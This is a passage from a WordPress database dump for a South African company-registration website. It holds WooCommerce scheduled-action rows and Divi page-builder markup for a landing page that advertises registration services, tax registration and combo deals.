20:17:22','2019-07-28 20:17:22','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d3e0742dc5495.18759224-mUDlVO2NOnm90RXQ0nNcPB66u8Tlwid7','','','2019-07-28 22:36:18','2019-07-28 20:36:18','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=31890',0,'scheduled-action','',3),(31891,0,'2019-07-28 21:36:18','2019-07-28 21:36:18','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d3e18653970e9.81534712-tVAimb2j44O0HuVYPVxFMYPzjcvksdzJ','','','2019-07-28 23:49:25','2019-07-28 21:49:25','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=31891',0,'scheduled-action','',3),(31892,0,'2019-07-28 21:36:18','2019-07-28 21:36:18','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d3e18654224f3.62416384-XVq7hdvc7YKEjaV7QJzbojrep1hbsjQD','','','2019-07-28 23:49:25','2019-07-28 21:49:25','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=31892',0,'scheduled-action','',3),(31893,0,'2019-07-28 22:49:25','2019-07-28 22:49:25','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d3e2a65428af0.14541468-WjfV0cMkGEo3Xw5rSmG5UfEbkwr2Kzo9','','','2019-07-29 01:06:13','2019-07-28 23:06:13','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=31893',0,'scheduled-action','',3),(31894,0,'2019-07-28 22:49:25','2019-07-28 22:49:25','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d3e2a654d8368.58840362-I8bZn0HEhioX2E1y09xDr7sTL4MUouRA','','','2019-07-29 01:06:13','2019-07-28 23:06:13','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=31894',0,'scheduled-action','',3),(31895,0,'2019-07-29 00:06:13','2019-07-29 00:06:13','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d3e65c88d2062.91374724-GnekWhvDRdC1rznJ85t7U0awqLiUiigQ','','','2019-07-29 05:19:36','2019-07-29 03:19:36','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=31895',0,'scheduled-action','',3),(31896,0,'2019-07-29 00:06:13','2019-07-29 00:06:13','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d3e65c896cb29.83514922-fit2bJW5vwUtIP79qtcsTJ7epT043XrG','','','2019-07-29 05:19:36','2019-07-29 03:19:36','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=31896',0,'scheduled-action','',3),(31897,0,'2019-07-29 04:19:36','2019-07-29 04:19:36','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d3e7d059cea22.01018533-SVrVpL4BzmSfDfduZy5fJj1gscKAmWpI','','','2019-07-29 06:58:45','2019-07-29 04:58:45','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=31897',0,'scheduled-action','',3),(31898,0,'2019-07-29 04:19:36','2019-07-29 04:19:36','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d3e7d05a54c98.35434293-iqUruAzLcwk6PpsvrNhCkAVwXduDsyMf','','','2019-07-29 06:58:45','2019-07-29 04:58:45','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=31898',0,'scheduled-action','',3),(31899,0,'2019-07-29 05:58:45','2019-07-29 05:58:45','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d3e96ac4afeb8.73459164-7dty8xzmtmmzLMg82SAiL8ixgNHXJQsE','','','2019-07-29 08:48:12','2019-07-29 06:48:12','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=31899',0,'scheduled-action','',3),(31900,0,'2019-07-29 05:58:45','2019-07-29 05:58:45','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d3e96ac5272d4.70419341-SZZR7EWpVy4lSysnfHO3ZFyiDNLudL6m','','','2019-07-29 08:48:12','2019-07-29 06:48:12','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=31900',0,'scheduled-action','',3),(31901,0,'2019-07-29 07:48:12','2019-07-29 07:48:12','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d3ea9ad1f9b84.05003707-OPL8ylq4KiQHcETvlp4UeuogkHQWxAIb','','','2019-07-29 10:09:17','2019-07-29 08:09:17','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=31901',0,'scheduled-action','',3),(31902,0,'2019-07-29 07:48:12','2019-07-29 07:48:12','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d3ea9ad2ecca1.03585537-E5V7KIWmiaL5Z6dwUesnrHNpzI9JkFt2','','','2019-07-29 10:09:17','2019-07-29 08:09:17','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=31902',0,'scheduled-action','',3),(31903,0,'2019-07-29 09:09:17','2019-07-29 09:09:17','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d3eba5e3796b6.24206221-wmdUW8tvTlaCiGsIDUHgEVGaGZ1ba4Ux','','','2019-07-29 11:20:30','2019-07-29 09:20:30','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=31903',0,'scheduled-action','',3),(31904,0,'2019-07-29 09:09:17','2019-07-29 09:09:17','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d3eba5e512309.57959853-mXMXYqpuuc6OQYTZM4HFyvkXOMENEen4','','','2019-07-29 11:20:30','2019-07-29 09:20:30','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=31904',0,'scheduled-action','',3),(31905,3,'2019-07-29 10:11:19','2019-07-29 08:11:19','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" custom_padding=\"10px|0px|0px|0px\" custom_margin=\"|||\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|48px|0px|false|false\"][et_pb_row custom_padding=\"0px|0px|0px|0px\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Call to Action\" _builder_version=\"3.22.3\" box_shadow_style=\"preset2\" custom_padding=\"3px|0px|43px|0px|false|false\"][et_pb_row custom_padding=\"29px|0px|0px|0px\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong>Select the company you require below or refer to menu above</strong></span><span style=\"font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\"><br /> </span></strong></span></h1>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" custom_padding=\"0|15px|0px|14px|false|false\" custom_margin=\"|||\" make_equal=\"on\" _builder_version=\"3.25\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_cta title=\"Private Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.24\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_cta title=\"Professional company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"800ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p class=\"\"><strong>Business Professionals  such as </strong><strong>Accountants, Lawyers and Doctors practising in a company</strong><span style=\"color: #ffffff;\"><strong>a</strong></span></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_cta title=\"Shareholder Role\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"1000ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|700|||||||\" button_icon=\"%%144%%\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" custom_padding=\"28px|0px|4px|0px\" _builder_version=\"3.25\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Product page\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.11)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"73%\" background_color_gradient_end_position=\"99%\" box_shadow_style=\"preset2\" custom_padding=\"6px|0px|22px|0px|false|false\"][et_pb_row column_structure=\"1_2,1_2\" custom_padding=\"30px|0px|14px|0px\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.2.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"color: #0c71c3; font-family: inherit; font-weight: normal;\"><strong>Most Popular<br /></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|off|off\" _builder_version=\"3.2.2\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\">Customise your requirement and SAVE</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" custom_padding=\"20px|20px||20px\" custom_margin=\"||20px|\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"3px\" border_color_all=\"#ffffff\" border_style_all=\"none\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_shop type=\"best_selling\" posts_number=\"9\" columns_number=\"3\" orderby=\"popularity\" sale_badge_color=\"rgba(255,35,83,0.69)\" icon_hover_color=\"#2fa318\" hover_overlay_color=\"rgba(124,218,36,0.23)\" hover_icon=\"%%45%%\" admin_label=\"Featured page\" _builder_version=\"3.26.3\" title_font=\"|700|||||||\" title_font_size=\"18px\" title_line_height=\"1.1em\" price_font=\"Open Sans|600|on||||||\" price_text_color=\"#0c71c3\" price_font_size=\"18px\" price_text_shadow_style=\"preset4\" custom_padding=\"20px|||10px\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Save\" url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" url_new_window=\"on\" use_icon=\"on\" font_icon=\"%%155%%\" icon_color=\"#0c71c3\" use_circle=\"on\" content_max_width=\"471px\" use_icon_font_size=\"on\" disabled_on=\"on|off|off\" 